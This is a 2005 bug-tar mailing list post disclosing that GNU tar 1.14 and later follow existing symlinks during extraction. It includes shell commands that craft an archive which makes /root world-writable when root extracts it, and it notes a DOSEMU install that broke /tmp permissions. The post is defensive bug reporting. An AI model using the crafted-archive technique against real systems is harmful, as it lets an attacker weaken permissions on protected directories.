[Bug-tar] Unexpected symlink attack due to change in link following beha

bug-tar

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Bug-tar] Unexpected symlink attack due to change in link following beha

From:	Clarence Dang
Subject:	[Bug-tar] Unexpected symlink attack due to change in link following behaviour
Date:	Fri, 9 Sep 2005 22:08:14 +1000
User-agent:	KMail/1.8

Hi,

I just discovered that tar 1.14 enabled the opposite of "--no-overwrite-dir" 
by default.  This is an unexpected and subtle change in behavior.


Users of tar who are unaware of this change are subject to the following 
exploit:

The hacker constructs "dir.tar" and sends it to the unsuspecting user.

~~~~
# mkdir dir
# >dir/YOU_HAVE_BEEN_HACKED.txt
# chmod a+rwx dir
# tar cf dir.tar dir
# rm -rf dir
~~~~

The user happens to have a symlink called "dir" in the current directory and 
untars "dir.tar":

~~~~
# tar --version
tar (GNU tar) 1.15.1

# ls -ld /root
drwx------  25 root root 1784 Sep  3 23:00 /root
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory

# ln -s /root dir  # (simulate already existing symlink)
# tar xf dir.tar

# ls -ld /root
drwxrwxrwx  25 root root 1824 Sep  3 23:02 /root
# ls -l /root/*.txt
-rw-r--r--  1 root root 0 Sep  3 23:02 /root/YOU_HAVE_BEEN_HACKED.txt

# ls -ld dir
lrwxrwxrwx  1 root root 5 Sep  3 23:06 dir -> /root
~~~~

An older version of tar gives the expected - and safer - behaviour:

~~~~
# tar --version
tar (GNU tar) 1.13.25
[...]

# ls -ld /root
drwx------  25 root root 1784 Sep  3 23:00 /root
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory

# ln -s /root dir  # (simulate already existing symlink)
# tar xf dir.tar

# ls -ld /root
drwx------   21 root     root         2144 Sep  3 22:35 /root/
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory

# ls -ld dir
drwxrwxrwx    2 root     root           88 Sep  3 23:02 dir/
~~~~


In-the-wild "exploit": Typing "make install" as root for the second time with 
DOSEMU 1.3.2 or CVS source (prior to a few minutes ago) will change the 
permissions of "/tmp" from 
"rwxrwxrwt" to "rwxr-xr-x", creating a DoS for non-root users.

https://sourceforge.net/tracker/?func=detail&atid=457447&aid=1224934&group_id=49784

The reason for this is that at "make install" time, a symbolic link 
"/usr/local/share/dosemu/freedos/tmp" is made to point to "/tmp".  On the 
second invocation of "make install", dosemu-freedos-bin.tgz is unpacked to 
"/usr/local/share" - however it contains a directory "dosemu/freedos/tmp" 
with permissions "rwxr-xr-x".


Suggested fix: Revert relevant behaviour to tar 1.13.25.  As DOSEMU has shown, 
it is too dangerous to change this kind of behaviour and expect users to 
realise that such a change has occured.  Imagine changing "rm -i" to delete 
files without prompting!


Clarence
[please CC me on replies]

[Prev in Thread]

Current Thread

[Next in Thread]

[Bug-tar] Unexpected symlink attack due to change in link following behaviour, Clarence Dang <=
- Re: [Bug-tar] Unexpected symlink attack due to change in link following behaviour, Sergey Poznyakoff, 2005/09/12
  - Re: [Bug-tar] Unexpected symlink attack due to change in link following behaviour, Clarence Dang, 2005/09/12
    - Re: [Bug-tar] Unexpected symlink attack due to change in link following behaviour, Sergey Poznyakoff, 2005/09/12
    - Re: [Bug-tar] Unexpected symlink attack due to change in link following behaviour, Joerg Schilling, 2005/09/12
    - Re: [Bug-tar] Unexpected symlink attack due to change in link following behaviour, Paul Eggert, 2005/09/12

Prev by Date: [Bug-tar] compression and autodetection issues when working with tape drives
Next by Date: Re: [Bug-tar] BUG in version 1.13.25
Previous by thread: [Bug-tar] compression and autodetection issues when working with tape drives
Next by thread: Re: [Bug-tar] Unexpected symlink attack due to change in link following behaviour
Index(es):
- Date
- Thread